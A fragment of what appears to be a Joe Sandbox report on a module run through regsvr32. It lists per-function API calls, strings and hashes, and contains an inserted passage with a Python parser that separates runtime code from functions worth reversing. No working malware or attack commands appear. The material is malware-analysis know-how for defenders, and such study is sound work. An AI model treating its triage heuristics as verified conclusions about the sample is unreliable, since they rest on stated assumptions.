                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorObjectSingleStatusWaitmemcpy
                                                                    • String ID: -pty$cygw$msys$win-
                                                                    • API String ID: 2933437151-1440016460
                                                                    • Opcode ID: 8f02847d1ed428cd4c7577fc284afbe1914e79c24072a468abdfbab29ae796be
                                                                    • Instruction ID: 8c158235c21782d8188f597112934c0e97c8665f31c01fb91d6d1a29822584bb
                                                                    • Opcode Fuzzy Hash: 8f02847d1ed428cd4c7577fc284afbe1914e79c24072a468abdfbab29ae796be
                                                                    • Instruction Fuzzy Hash: 6402D522B0A7829AF7609B68DC60BF92794EB44388F544135EA6D8BBDDDF3CD585C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: H$H
                                                                    • API String ID: 2221118986-136785262
                                                                    • Opcode ID: f29fe778d85692410cca65d8c0efbf48e7a3d409e8377b04913b479e708d458f
                                                                    • Instruction ID: 4f9a0ba9177dbbdf45c608558beed9ba77f18d0c0e56c74717c1946323888020
                                                                    • Opcode Fuzzy Hash: f29fe778d85692410cca65d8c0efbf48e7a3d409e8377b04913b479e708d458f
                                                                    • Instruction Fuzzy Hash: 23020723B19B8682DB118F299410AB96760FB56BA4F54A722DFBE433E5DF3DD185C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: 17ba022a7d551e7a887192520d722618291e79d5bf0b22fceea55ecc7af7dec7
                                                                    • Instruction ID: 9a27878d26cdd768a5f8844fe015426b9de2cc885a0971e96bbb2efa43606ba5
                                                                    • Opcode Fuzzy Hash: 17ba022a7d551e7a887192520d722618291e79d5bf0b22fceea55ecc7af7dec7
                                                                    • Instruction Fuzzy Hash: 83220712E1ABC582E7018B2885157F92720FBA9798F45B334DFBD562E6EF39E195C300
                                                                    APIs
                                                                    • BCryptGenRandom.BCRYPT(?,00000000,00000000,00007FFDFB268FE5,?,?,00000000,00007FFDFB265B81), ref: 00007FFDFB2694E2
                                                                    • SystemFunction036.ADVAPI32(?,00000000,00000000,00007FFDFB268FE5,?,?,00000000,00007FFDFB265B81), ref: 00007FFDFB2694F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CryptFunction036RandomSystem
                                                                    • String ID:
                                                                    • API String ID: 1232939966-0
                                                                    • Opcode ID: 8c3f8ec892ce3af16b0af55f2ba24b1024e06f975336119adb2d3dc77502f212
                                                                    • Instruction ID: a106d8b4bee0ffedd33aa56b52b6c66b8aa50bc3c72a8b124ca73e94675edce7
                                                                    • Opcode Fuzzy Hash: 8c3f8ec892ce3af16b0af55f2ba24b1024e06f975336119adb2d3dc77502f212
                                                                    • Instruction Fuzzy Hash: 0DF0F062F1B19649FF74246B5E19EB195820F187F4C284331AD3CC3AEAAC2858825210
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Versionmemset
                                                                    • String ID:
                                                                    • API String ID: 3136939366-0
                                                                    • Opcode ID: 92f276b95c9412c8838e8edfa986efb751212cd665cf99de9ccdbafe4ee7030b
                                                                    • Instruction ID: 58483280aed956e0eba6cca25acfcb3c89756d5710dd2d441587f3133377af8a
                                                                    • Opcode Fuzzy Hash: 92f276b95c9412c8838e8edfa986efb751212cd665cf99de9ccdbafe4ee7030b
                                                                    • Instruction Fuzzy Hash: 60F0F632B0A61B92E770AE12E0117BA62908B88744F444171DBAD437F8CE3CD9068F04
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 547ac9d1fa80003c072093df209460cb2d78731ac40638971273e09c1edc407b
                                                                    • Instruction ID: fe68edecaa010ee391c4119b3baae6eab0c997e363c0471084e0cf6ef8e1da93
                                                                    • Opcode Fuzzy Hash: 547ac9d1fa80003c072093df209460cb2d78731ac40638971273e09c1edc407b
                                                                    • Instruction Fuzzy Hash: 1941D322B0A75682F7619B15E460BB966A0FF88784F445131EAED477EDDE3CD5428300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID:
                                                                    • API String ID: 542301482-0
                                                                    • Opcode ID: 65c99bcea707947771c2063d95bc6e976da4805a9c62869e954726bbee57f278
                                                                    • Instruction ID: ffd82a09ebffcb04900c44bd84465107370201e27c5578b3cd11f8646cad7f27
                                                                    • Opcode Fuzzy Hash: 65c99bcea707947771c2063d95bc6e976da4805a9c62869e954726bbee57f278
                                                                    • Instruction Fuzzy Hash: 2121A43270AA4291E7219B11E460BAA77A4FB84794F544130EBED47BE9DF7CD1918700
                                                                    Similarity
                                                                    • API ID: ErrorLast$FullNamePath
                                                                    • String ID: \\?\$\\?\UNC\
                                                                    • API String ID: 2482867836-3019864461
                                                                    • Opcode ID: f987178dd3b3f82022f953fc169ff115279cc16a8549942425500b39b729e88a
                                                                    • Instruction ID: 7317b774bf54335eafa95e4bdd3635bb56cff996e8bca67f179bee7d4ebc7a6c
                                                                    • Opcode Fuzzy Hash: f987178dd3b3f82022f953fc169ff115279cc16a8549942425500b39b729e88a
                                                                    • Instruction Fuzzy Hash: D012F7A2B0A69389EB749B21C464BB92395FB04BD4F44C535DA6C8B7EDDF3CE5818700
                                                                    Similarity
                                                                    • API ID: ErrorLast$AddressFullHandleModuleNamePathProcmemcmpmemcpy
                                                                    • String ID: SetThreadDescription$kernel32
                                                                    • API String ID: 1783792165-1950310818
                                                                    • Opcode ID: 41d5366597417468d2c84e3e1d372b1b21ce52746e922d497d61c5bed90c9ffd
                                                                    • Instruction ID: b60e53dab79714110e3e588cfe6fd359bc5fdaeb8de2bb7be2935440beac8878
                                                                    • Opcode Fuzzy Hash: 41d5366597417468d2c84e3e1d372b1b21ce52746e922d497d61c5bed90c9ffd
                                                                    • Instruction Fuzzy Hash: D8B1A162B0A6838AEB269B11DC64BF9A665FF44BC8F448031DD6D977EDDE3CD2418700
                                                                    Similarity
                                                                    • API ID: Value$PrngProcess
                                                                    • String ID:
                                                                    • API String ID: 3259538350-0
                                                                    • Opcode ID: cfcbfefdd9e33552643352429b236e553508dad3f7d1eeb3e44439b765618666
                                                                    • Instruction ID: 5817771638ccd745d4cf7828296bff59e8f2abd46a5c246b8f32ba69f03e5338
                                                                    • Opcode Fuzzy Hash: cfcbfefdd9e33552643352429b236e553508dad3f7d1eeb3e44439b765618666
                                                                    • Instruction Fuzzy Hash: 68811221F0B65742FB156B158520BBD52D1AF84BD0F099471DEAC873FEDE2DA8428380
                                                                    Similarity
                                                                    • API ID: Value$PrngProcessVersionmemset
                                                                    • String ID:
                                                                    • API String ID: 1585940240-0
                                                                    • Opcode ID: 1f6d258840ea14e6c065f27eeb8c34b1f360a06c8dabc480339fcc7cba82b9b0
                                                                    • Instruction ID: 4c3a5049cce953e170ebdc651a56ef523397fb33851ab08729c605682da8a56c
                                                                    • Opcode Fuzzy Hash: 1f6d258840ea14e6c065f27eeb8c34b1f360a06c8dabc480339fcc7cba82b9b0
                                                                    • Instruction Fuzzy Hash: 13711721F0E65752FB656B1594607FD66A0AF88B80F0C9171DBAD877FEDE2CE9418300
                                                                    Similarity
                                                                    • API ID: Volume$NameNamesPath
                                                                    • String ID: OI$TI
                                                                    • API String ID: 1552044656-128833160
                                                                    • Opcode ID: 62f032ec465d3798ef01c4089d649f9cf3ee10aaad0414ccb3deae31c2f2a27f
                                                                    • Instruction ID: 0c9beb16474fb4046313707a57f5e44eede52ff1d83e90e2bd9a2429f0a8a81e
                                                                    • Opcode Fuzzy Hash: 62f032ec465d3798ef01c4089d649f9cf3ee10aaad0414ccb3deae31c2f2a27f
                                                                    • Instruction Fuzzy Hash: BA324F22B0E6C291EB719B15E454BEEA3A0FB84794F445235CAAC43AEDDF7DD484CB40
                                                                    Strings
                                                                    • assertion failed: new_left_len <= CAPACITY, xrefs: 00007FFDFB27AC43
                                                                    • assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FFDFB27B213
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY
                                                                    • API String ID: 3510742995-2079967719
                                                                    • Opcode ID: 3bf318296a2faa0e97b7af8703ec710a53762a8deb6518adb9d9b506360eddcd
                                                                    • Instruction ID: b7c2bafc64fa9d30670a6c2fc8fe380f950463d23ccf97ad92f99da3fd71e25a
                                                                    • Opcode Fuzzy Hash: 3bf318296a2faa0e97b7af8703ec710a53762a8deb6518adb9d9b506360eddcd
                                                                    • Instruction Fuzzy Hash: 5E42C032616BC685E721CF24E8507ED33A8FB68788F548236DE9D5B7A8DF749295C300
                                                                    Similarity
                                                                    • API ID: QueryVirtual
                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                    • API String ID: 1804819252-1534286854
                                                                    • Opcode ID: 813c4ee8a044320c83cd0d7a729d0b00980456566e1ead92c277795f05c6ef47
                                                                    • Instruction ID: 5430985205429bb92ba3d97581a01d7eaa469bdfba3a84a52dc1a57bd16bedf3
                                                                    • Opcode Fuzzy Hash: 813c4ee8a044320c83cd0d7a729d0b00980456566e1ead92c277795f05c6ef47
                                                                    • Instruction Fuzzy Hash: 0B418171B8A64783EB10AB11E460AA97BE0EF49BD8F484234DA9D077F9DE3DE545C340
                                                                    Strings
                                                                    • environment variable not foundenvironment variable was not valid unicode: , xrefs: 00007FFDFB28EAED
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnvironmentVariable
                                                                    • String ID: environment variable not foundenvironment variable was not valid unicode:
                                                                    • API String ID: 2691138088-3632183283
                                                                    • Opcode ID: 335b4f973b880afa8172e4930a0d73d7029cb10b69d3ae74776fe86e5a4af0f5
                                                                    • Instruction ID: 127fed11eccf46651fe9b81c7fa86390d27763a44fc5a743989cd0e150702e5e
                                                                    • Opcode Fuzzy Hash: 335b4f973b880afa8172e4930a0d73d7029cb10b69d3ae74776fe86e5a4af0f5
                                                                    • Instruction Fuzzy Hash: 50B19366B06A8385EB24AB21D854BED2365FB05BC8F448436CE6C9B7EDDF7CD2418340
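Several of the records above carry strings that identify compiler and runtime code rather than the sample's own logic: the two "assertion failed:" messages are Rust standard-library B-tree assertions, "environment variable not found" / "environment variable was not valid unicode:" is the Rust std::env::VarError text, and "Mingw-w64 runtime failure:" with the VirtualQuery/VirtualProtect messages belongs to the mingw-w64 CRT, which is consistent with a Rust module built for the GNU Windows target. When reversing the dumped regsvr32 module, those functions can be set aside. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses records in the layout used on this page, rebases each string xref to an RVA against the Source File offset, and separates functions whose String ID contains one of those runtime messages. The headers, field names and sample values come from this page; treating "$" as a separator between groups in API ID and String ID is an assumption about the report's notation.

```python
"""Parse Joe Sandbox per-function disassembly records and triage them.

Added example, not part of the Joe Sandbox report or the analysed sample.
SAMPLE is constructed from two records copied off this page, in the page's
layout (APIs / Strings / Memory Dump Source / Similarity headers, '•' bullets).
"""
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
Strings
• assertion failed: new_left_len <= CAPACITY, xrefs: 00007FFDFB27AC43
Memory Dump Source
• Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
Similarity
• API ID: memcpy
• String ID: assertion failed: new_left_len <= CAPACITY
• API String ID: 3510742995-2079967719
• Opcode Fuzzy Hash: 3bf318296a2faa0e97b7af8703ec710a53762a8deb6518adb9d9b506360eddcd
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
Similarity
• API ID: ErrorLast$AddressFullHandleModuleNamePathProcmemcmpmemcpy
• String ID: SetThreadDescription$kernel32
• API String ID: 1783792165-1950310818
• Opcode Fuzzy Hash: 41d5366597417468d2c84e3e1d372b1b21ce52746e922d497d61c5bed90c9ffd
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
FIELDS = {"API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id",
          "Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
          "Opcode Fuzzy Hash": "opcode_fuzzy", "Instruction Fuzzy Hash": "instruction_fuzzy"}
XREF_RE = re.compile(r"^• (?P<s>.*), xrefs: (?P<addr>[0-9A-Fa-f]+)$")
BASE_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")
# Message fragments of the Rust standard library (panic assertions, the
# std::env::VarError text) and of the mingw-w64 CRT, all present in the report.
# A function whose String ID carries one of them is compiler/runtime code.
RUNTIME_MARKERS = ("assertion failed:", "Mingw-w64 runtime failure:",
                   "environment variable not found")

@dataclass
class FunctionRecord:
    module_base: int = 0                # "Offset:" of the Source File line
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy: str = ""
    instruction_fuzzy: str = ""
    strings: list = field(default_factory=list)   # (text, absolute xref address)

    def apis(self):
        """Assumption about the notation: '$' separates groups in API ID / String ID."""
        return [p for p in self.api_id.split("$") if p]
    def string_rvas(self):
        """Xrefs as RVAs, usable in the dumped PE whatever its load address."""
        return [addr - self.module_base for _, addr in self.strings]
    def is_runtime_noise(self):
        return any(m in self.string_id for m in RUNTIME_MARKERS)


def parse_records(text):
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            # "APIs" opens a record; so does any header after a finished one (headers stripped).
            if line == "APIs" or current is None or current.api_id:
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is not None and line.startswith("• "):
            if section == "Strings":
                m = XREF_RE.match(line)
                if m:
                    current.strings.append((m.group("s"), int(m.group("addr"), 16)))
            elif section == "Memory Dump Source" and line.startswith("• Source File:"):
                m = BASE_RE.search(line)
                if m:
                    current.module_base = int(m.group(1), 16)
            elif section == "Similarity":
                key, _, value = line[2:].partition(":")
                attr = FIELDS.get(key.strip())
                if attr:
                    setattr(current, attr, value.strip())
    return records


def triage(text):
    """Return (payload, runtime): reverse the first list, skip the second."""
    recs = parse_records(text)
    return ([r for r in recs if not r.is_runtime_noise()],
            [r for r in recs if r.is_runtime_noise()])
```

Calling triage() on a saved copy of the report text (SAMPLE stands in for it here) puts the SetThreadDescription/GetProcAddress function in the payload list and the memcpy/B-tree assertion function in the runtime list, and string_rvas() reports its xref 00007FFDFB27AC43 as RVA 0x7AC43, the offset to open in the dumped PE or the .jbxd snapshot.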
                                                                    Similarity
                                                                    • API ID: ErrorLast$FullNamePathmemcmpmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2015650653-0
                                                                    • Opcode ID: c8321181978a4963cae34ea038d7f953b1d95242421ca7f18ca5682775f57a72
                                                                    • Instruction ID: 123fd878e048c75d1c5f5c10951494377528a076541780970f2750409536d176
                                                                    • Opcode Fuzzy Hash: c8321181978a4963cae34ea038d7f953b1d95242421ca7f18ca5682775f57a72
                                                                    • Instruction Fuzzy Hash: 03A1A362B0AA8389EB269B11DC64BF96255FF05BC8F448035CD6C8B7EDDE3CD2448700
                                                                    Similarity
                                                                    • API ID: ErrorLast$CurrentDirectoryFileModuleName
                                                                    • String ID:
                                                                    • API String ID: 1505103792-0
                                                                    • Opcode ID: 53ae84dd1857602d04ad9f3a9051b19f53a886f4bf7aa711c71c4e051393cf9c
                                                                    • Instruction ID: bc223ddeda68fa9b55c082914b15c58d1eca2b0f555712806dd52d3a26609d71
                                                                    • Opcode Fuzzy Hash: 53ae84dd1857602d04ad9f3a9051b19f53a886f4bf7aa711c71c4e051393cf9c
                                                                    • Instruction Fuzzy Hash: 7A71F522B0969355FB24AB25D825BBD2269FF14BC8F148131DE6C9B6DDDF6CE2418300
                                                                    Similarity
                                                                    • API ID: Query$Close$CounterOpenRemove
                                                                    • String ID: LoadUpdateEvent$\System\Cpu Queue Length
                                                                    • API String ID: 1254545005-2417354242
                                                                    • Opcode ID: 45d828bd0206fad47acc67b38ec4db276fcd54069d5b1721df8aaaab19bf8811
                                                                    • Instruction ID: 070d15b79907e03f181053798ed22fe4e58f4c801305c9ed16316632c967629a
                                                                    • Opcode Fuzzy Hash: 45d828bd0206fad47acc67b38ec4db276fcd54069d5b1721df8aaaab19bf8811
                                                                    • Instruction Fuzzy Hash: FD415426A09A4382E750EB15E4617BAA3A0EF843D4F544235F6ED87AEDDF7DD480C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: abort$CaptureContextExceptionRaiseUnwind
                                                                    • String ID: CCG
                                                                    • API String ID: 4122134289-1584390748
                                                                    • Opcode ID: ea82f6b06087ce60718abc6ba6b4de118ec52333f66a0ef5de84b6cd79baedbc
                                                                    • Instruction ID: 747265d202ab5499b11f8d88cbca4c9e18736a4a85e5ba96bf9e9ea66ce71732
                                                                    • Opcode Fuzzy Hash: ea82f6b06087ce60718abc6ba6b4de118ec52333f66a0ef5de84b6cd79baedbc
                                                                    • Instruction Fuzzy Hash: 6A318432A49BC686D720AF24E4503AA77B0FBD9788F505225DACC13779DF79D195CB00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: FindNextVolumememcpymemset
                                                                    • String ID:
                                                                    • API String ID: 3717567422-0
                                                                    • Opcode ID: 893e2f60b9d4348fc013897b7af0759ed3ea8f91343f5dc91cd62bf81765715d
                                                                    • Instruction ID: 23fec247500d527bafc7a25127a3c991bb801d61019c77be311b8ad48c66191c
                                                                    • Opcode Fuzzy Hash: 893e2f60b9d4348fc013897b7af0759ed3ea8f91343f5dc91cd62bf81765715d
                                                                    • Instruction Fuzzy Hash: 7FC1CF62B1E64391EB20AB119820B7A66A0FF85794F545235EEBD877FEDF3CE5408700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID: [_^A^$tz%
                                                                    • API String ID: 3702945584-1242015645
                                                                    • Opcode ID: 797e1611b7df3e60906837c21a4aba0a3844e2732ac52dfb3dcd776a591eb48a
                                                                    • Instruction ID: 59a667de009954f03e5663f67d0a55525bf0f9b6872d81a5820bf4eaf8f00eb6
                                                                    • Opcode Fuzzy Hash: 797e1611b7df3e60906837c21a4aba0a3844e2732ac52dfb3dcd776a591eb48a
                                                                    • Instruction Fuzzy Hash: A3C1BE21A0DAC685F7265B18E015BF9A3A1FF94784F049231EE9C437B9EF3DE5928740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
